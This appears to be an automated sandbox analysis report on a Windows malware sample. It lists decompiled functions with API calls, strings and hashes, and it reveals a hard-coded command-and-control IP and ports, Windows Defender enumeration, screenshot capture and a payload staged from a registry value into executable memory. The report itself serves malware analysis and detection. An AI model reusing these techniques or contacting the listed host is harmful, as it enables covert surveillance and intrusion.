                                                                                                                                                                      • Opcode ID: 1cea9e9e915c448f2fcf9f63bfb7ca15ff0bfb350c8fb5a9c2a4ab10b54e7f67
                                                                                                                                                                      • Instruction ID: 44525a7678f02faf105d8ce9cd6458abbe9287727f8eecc7c6b2bb50bf3671bf
                                                                                                                                                                      • Opcode Fuzzy Hash: 1cea9e9e915c448f2fcf9f63bfb7ca15ff0bfb350c8fb5a9c2a4ab10b54e7f67
                                                                                                                                                                      • Instruction Fuzzy Hash: F7F1E7F5940308AFDB24EB64DC45FEB73B8AF48710F00865DE71AAB181EA70A645CF55
                                                                                                                                                                      Function 02BD0032 Relevance: 72.5, APIs: 3, Strings: 38, Instructions: 795memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 02BD04AE
                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 02BD04DE
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02BD04F5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual$InfoNativeSystem
                                                                                                                                                                      • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                      • API String ID: 4117132724-2899676511
                                                                                                                                                                      • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                      • Instruction ID: 6ae8428618f4cc32d2051ecc4b0d2f740fa7a6dbc4ff3790aba6124f2105d08f
                                                                                                                                                                      • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E628A315083858FD720DF24C880BABBBE5FF94704F044D6DE9C99B252E774A989CB96
                                                                                                                                                                      Function 0377DF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354sleepregistrysynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 251 377df10-377df72 call 3780542 Sleep 254 377df97-377df9d 251->254 255 377df74-377df91 call 377f707 call 377fa29 CloseHandle 251->255 257 377dfa4-377e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 377fa29 CloseHandle call 377f707 254->257 258 377df9f call 3777620 254->258 255->254 267 377e01b-377e026 call 3772c90 257->267 268 377e028 257->268 258->257 270 377e02c-377e046 call 377f707 267->270 268->270 274 377e054 270->274 275 377e048-377e049 call 3779730 270->275 277 377e058 274->277 279 377e04e-377e052 275->279 278 377e063-377e06f call 377ce00 277->278 282 377e071-377e0b7 call 377f876 * 2 278->282 283 377e0b9-377e0fa call 377f876 * 2 278->283 279->277 292 377e100-377e110 282->292 283->292 293 377e152-377e15a 292->293 294 377e112-377e14c call 377ce00 call 377f876 * 2 292->294 295 377e162-377e169 293->295 296 377e15c-377e15e 293->296 294->293 299 377e177-377e17b 295->299 300 377e16b-377e175 295->300 296->295 302 377e181-377e187 299->302 300->302 304 377e1c6-377e1ee call 3780542 call 3772da0 302->304 305 377e189-377e1a3 EnumWindows 302->305 312 377e200-377e2ac call 3780542 CreateEventA call 377f876 call 377ca70 304->312 313 377e1f0-377e1fb Sleep 304->313 305->304 307 377e1a5-377e1c4 Sleep EnumWindows 305->307 307->304 307->307 321 377e2b7-377e2bd 312->321 313->278 322 377e2bf-377e2f3 Sleep RegOpenKeyExW 321->322 323 377e318-377e32c call 3775430 321->323 325 377e2f5-377e30b RegQueryValueExW 322->325 326 377e311-377e316 322->326 327 377e331-377e337 323->327 325->326 326->321 326->323 328 377e36a-377e370 327->328 329 377e339-377e365 CloseHandle 327->329 330 377e372-377e38e call 377fa29 328->330 331 377e390 328->331 329->278 334 377e394 330->334 331->334 336 377e396-377e39d 334->336 337 377e39f-377e3ae Sleep 336->337 338 377e40d-377e420 336->338 337->336 339 377e3b0-377e3b7 337->339 342 377e432-377e46c call 3780542 Sleep CloseHandle 338->342 343 377e422-377e42c WaitForSingleObject CloseHandle 338->343 339->338 340 377e3b9-377e3cb 339->340 346 377e3dd-377e408 Sleep CloseHandle 340->346 347 377e3cd-377e3d7 WaitForSingleObject CloseHandle 340->347 342->278 343->342 346->278 347->346
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03780542: __fassign.LIBCMT ref: 03780538
                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 0377DF64
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377DF91
                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0377DFA9
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377DFE0
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(037775B0), ref: 0377DFEE
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377E007
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • EnumWindows.USER32(03775CC0,?), ref: 0377E19D
                                                                                                                                                                      • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0377E1AA
                                                                                                                                                                      • EnumWindows.USER32(03775CC0,?), ref: 0377E1BE
                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 0377E1F5
                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0377E241
                                                                                                                                                                      • Sleep.KERNEL32(00000FA0), ref: 0377E2C4
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0377E2EB
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0377E30B
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377E35D
                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?), ref: 0377E3A4
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0377E3D0
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 0377E3D7
                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?), ref: 0377E3E2
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377E400
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0377E425
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 0377E42C
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 0377E446
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377E464
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                                                                                      • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19092$19093$Console$IpDatespecial
                                                                                                                                                                      • API String ID: 1511462596-2550096010
                                                                                                                                                                      • Opcode ID: c09f34afa6541039d1259f567474b3f3d02a15a8cb3a1c1abddde8655db7447b
                                                                                                                                                                      • Instruction ID: 7035dfec30416857b9a30a41b0dc6a5b9ab44e7928c89654bb4b5391307f44ab
                                                                                                                                                                      • Opcode Fuzzy Hash: c09f34afa6541039d1259f567474b3f3d02a15a8cb3a1c1abddde8655db7447b
                                                                                                                                                                      • Instruction Fuzzy Hash: A7D1E4B0648300AFEB20FF64DC85E2EB7A8FBC9704F148B2EF1559A285D7759445CB62
                                                                                                                                                                      Function 0377BC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0377BC8F
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0377BC9C
                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0377BCA2
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0377BCAD
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0377BCBA
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000076), ref: 0377BCC2
                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0377BCD3
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004E), ref: 0377BCF8
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004F), ref: 0377BD26
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004C), ref: 0377BD78
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004D), ref: 0377BD8D
                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0377BDA6
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0377BDB4
                                                                                                                                                                      • SetStretchBltMode.GDI32(?,00000003), ref: 0377BDC0
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004F), ref: 0377BDCD
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004E), ref: 0377BDE0
                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0377BE07
                                                                                                                                                                      • _memset.LIBCMT ref: 0377BE7A
                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0377BE97
                                                                                                                                                                      • _memset.LIBCMT ref: 0377BEAF
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0377BF23
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0377BF2D
                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0377BF39
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0377BFDF
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0377BFE9
                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0377BFF5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                                                                                      • String ID: ($6$gfff$gfff
                                                                                                                                                                      • API String ID: 3293817703-713438465
                                                                                                                                                                      • Opcode ID: 16dd87f7aa778c0403997bfa06dffbbcdd2007631636f6452da5d41b6d3213f6
                                                                                                                                                                      • Instruction ID: bd121afc13d7202e4145f609d041b6eba53151020aab29735455b884f5c0cb80
                                                                                                                                                                      • Opcode Fuzzy Hash: 16dd87f7aa778c0403997bfa06dffbbcdd2007631636f6452da5d41b6d3213f6
                                                                                                                                                                      • Instruction Fuzzy Hash: DDD17FB1E01308AFDB14EFE9E889A9EBBB9FF48300F14452AF505AB341D7749905CB91
                                                                                                                                                                      Function 03776A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03776A94
                                                                                                                                                                      • wsprintfW.USER32 ref: 03776AA7
                                                                                                                                                                        • Part of subcall function 03776910: GetCurrentProcessId.KERNEL32(A0516FA3,00000000,00000000,75BF73E0,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776938
                                                                                                                                                                        • Part of subcall function 03776910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776947
                                                                                                                                                                        • Part of subcall function 03776910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776960
                                                                                                                                                                        • Part of subcall function 03776910: CloseHandle.KERNEL32(00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 0377696B
                                                                                                                                                                      • _memset.LIBCMT ref: 03776AC2
                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 03776ADB
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?), ref: 03776B12
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 03776B19
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03776B3F
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03776B49
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 03776B5D
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03776B85
                                                                                                                                                                      • GetSidSubAuthorityCount.ADVAPI32 ref: 03776B98
                                                                                                                                                                      • GetSidSubAuthority.ADVAPI32(00000000), ref: 03776BA6
                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 03776BB5
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03776BC2
                                                                                                                                                                      • wsprintfW.USER32 ref: 03776C1B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                                                                                      • String ID: -N/$NO/$None/%s
                                                                                                                                                                      • API String ID: 3036438616-3095023699
                                                                                                                                                                      • Opcode ID: 4d29e2ec9422c828eee98cd2ceb5bc759bab9370e1fe7103e61637e5b945d1b4
                                                                                                                                                                      • Instruction ID: 703e4eb95ebd112c768aa09972a7601325295794eeb5f36b350b883565f5ac7a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d29e2ec9422c828eee98cd2ceb5bc759bab9370e1fe7103e61637e5b945d1b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2941E5B0A0061CAFEF20EB64DC88FEE7778EB0E310F048596F60596149DA34D995CFA0
                                                                                                                                                                      Function 03776150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222stringcomregistryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 755 3776150-37761a5 call 3786770 call 378004b 760 37761a7-37761ae 755->760 761 3776201-3776228 CoCreateInstance 755->761 764 37761b0-37761b2 call 3776050 760->764 762 3776422-377642f lstrlenW 761->762 763 377622e-3776282 761->763 765 3776441-3776450 762->765 766 3776431-377643b lstrcatW 762->766 772 377640a-3776418 763->772 773 3776288-37762a2 763->773 769 37761b7-37761b9 764->769 770 3776452-3776457 765->770 771 377645a-377647a call 377f00a 765->771 766->765 774 37761db-37761ff call 378004b 769->774 775 37761bb-37761d9 lstrcatW * 2 769->775 770->771 772->762 778 377641a-377641f 772->778 773->772 782 37762a8-37762b4 773->782 774->761 774->764 775->774 778->762 783 37762c0-3776363 call 3786770 wsprintfW RegOpenKeyExW 782->783 786 37763e9-37763ff 783->786 787 3776369-37763ba call 3786770 RegQueryValueExW 783->787 790 3776402-3776404 786->790 791 37763dc-37763e3 RegCloseKey 787->791 792 37763bc-37763da lstrcatW * 2 787->792 790->772 790->783 791->786 792->791
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377618B
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,0379510C,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 037761CD
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,0379535C,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 037761D9
                                                                                                                                                                      • CoCreateInstance.OLE32(03792480,00000000,00000017,0379578C,?,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 03776220
                                                                                                                                                                      • _memset.LIBCMT ref: 037762CE
                                                                                                                                                                      • wsprintfW.USER32 ref: 03776336
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0377635F
                                                                                                                                                                      • _memset.LIBCMT ref: 03776376
                                                                                                                                                                        • Part of subcall function 03776050: _memset.LIBCMT ref: 0377607C
                                                                                                                                                                        • Part of subcall function 03776050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03776088
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                                                                                      • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                      • API String ID: 1221949200-1583895642
                                                                                                                                                                      • Opcode ID: 2f0bcb90ad1e9310a18a10f10c5e3d0e78be4cdea297a9cf0d4550fad76cc038
                                                                                                                                                                      • Instruction ID: 3d77d207212e75f97fb422f9a3649dc002664e96b06e808581c6e0eeb7b2a1b5
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f0bcb90ad1e9310a18a10f10c5e3d0e78be4cdea297a9cf0d4550fad76cc038
                                                                                                                                                                      • Instruction Fuzzy Hash: F38192F1A40628AFDB20EB54CC44FAEB7B8EB48704F4446C9F719A7146D674AA41CFA4
                                                                                                                                                                      Function 037780F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03778132
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,A:\), ref: 03778166
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,B:\), ref: 03778176
                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037781A6
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 037781B7
                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 037781CE
                                                                                                                                                                      • lstrcpyW.KERNEL32(00000AD4,?), ref: 03778204
                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 03778228
                                                                                                                                                                      • lstrcatW.KERNEL32(?,00000000), ref: 03778233
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                                                                                      • String ID: A:\$B:\
                                                                                                                                                                      • API String ID: 950920757-1009255891
                                                                                                                                                                      • Opcode ID: 623f28c4906587f435313305346588dabe03913ce6ace84e658f71a8a5db95ee
                                                                                                                                                                      • Instruction ID: 47d436fca33e0db501ea430445fe5a68ea5ddf0def03a6882c3acea557dce79e
                                                                                                                                                                      • Opcode Fuzzy Hash: 623f28c4906587f435313305346588dabe03913ce6ace84e658f71a8a5db95ee
                                                                                                                                                                      • Instruction Fuzzy Hash: 5541CA71A0121CEBDF20EF64DD85AEEB37CEF44710F04459ADA09A7141E774DA05CBA5
                                                                                                                                                                      Function 03776790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03775320: InterlockedDecrement.KERNEL32(00000008), ref: 0377536F
                                                                                                                                                                        • Part of subcall function 03775320: SysFreeString.OLEAUT32(00000000), ref: 03775384
                                                                                                                                                                        • Part of subcall function 03775320: SysAllocString.OLEAUT32(03795148), ref: 037753D5
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03795148,037769A4,03795148,00000000,75BF73E0), ref: 037767F4
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 037767FE
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 03776816
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0377681D
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0377683F
                                                                                                                                                                      • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03776871
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0377687B
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 037768E6
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 037768ED
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                                                                                      • String ID: NONE_MAPPED
                                                                                                                                                                      • API String ID: 1317816589-2950899194
                                                                                                                                                                      • Opcode ID: f7c1479e3f578be32b0ba0ea10676f6b769f1e75ddafa9a518a9879168128c2a
                                                                                                                                                                      • Instruction ID: fef9d745039a28d6aa91d8b06c27eb1a97560e1ece2c9fc7bd517400655588bc
                                                                                                                                                                      • Opcode Fuzzy Hash: f7c1479e3f578be32b0ba0ea10676f6b769f1e75ddafa9a518a9879168128c2a
                                                                                                                                                                      • Instruction Fuzzy Hash: 494195B5A0021CAFDF20EB64DD48FEEB37DEB89700F048599E709AB145DA745A85CF60
                                                                                                                                                                      Function 03776C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03776C8B
                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03776CAA
                                                                                                                                                                      • _memset.LIBCMT ref: 03776CE1
                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 03776CF4
                                                                                                                                                                      • swprintf.LIBCMT ref: 03776D39
                                                                                                                                                                      • swprintf.LIBCMT ref: 03776D4C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                                                                                      • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                                                                                      • API String ID: 3202570353-3501811827
                                                                                                                                                                      • Opcode ID: c6effab86de71ea921d8d8cbdbc2641c1dedc1171280596d5e15f76824dce5bc
                                                                                                                                                                      • Instruction ID: aa0d7716b205ee06259663bd4b1d3d58d6f879e99156f1072c212308bbb91451
                                                                                                                                                                      • Opcode Fuzzy Hash: c6effab86de71ea921d8d8cbdbc2641c1dedc1171280596d5e15f76824dce5bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 943161B6E0021CABDB14DFE5DC45FEEB7B9FB48700F50821EE91AAB241D6746905CB90
                                                                                                                                                                      Function 03776EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDXGIFactory.DXGI(0379579C,?,A0516FA3,74DEDF80,00000000,75BF73E0), ref: 03776F4A
                                                                                                                                                                      • swprintf.LIBCMT ref: 0377711E
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 037771C7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                                                                                      • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                                                                                      • API String ID: 3803070356-257307503
                                                                                                                                                                      • Opcode ID: 5c2837d3b6fca5ce85a06c641adef498103314b88886ca95fff5a68559796ace
                                                                                                                                                                      • Instruction ID: 56fbbd23d8c034159b1940972e58f070fe2b18037856014e6d7fbd69fb2835a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c2837d3b6fca5ce85a06c641adef498103314b88886ca95fff5a68559796ace
                                                                                                                                                                      • Instruction Fuzzy Hash: C6E15471E012699FDF28CE64CC84BFEB375AB89700F1446E9D919A7284D770AE81CF91
                                                                                                                                                                      Function 02C654C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263registrymemorysleepCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02C65507
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C6552E
                                                                                                                                                                      • _memset.LIBCMT ref: 02C65548
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C65563
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C65586
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 02C655B1
                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02C65605
                                                                                                                                                                      • _memset.LIBCMT ref: 02C65669
                                                                                                                                                                      • _memset.LIBCMT ref: 02C6568D
                                                                                                                                                                      • _memset.LIBCMT ref: 02C6569F
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C65726
                                                                                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02C65799
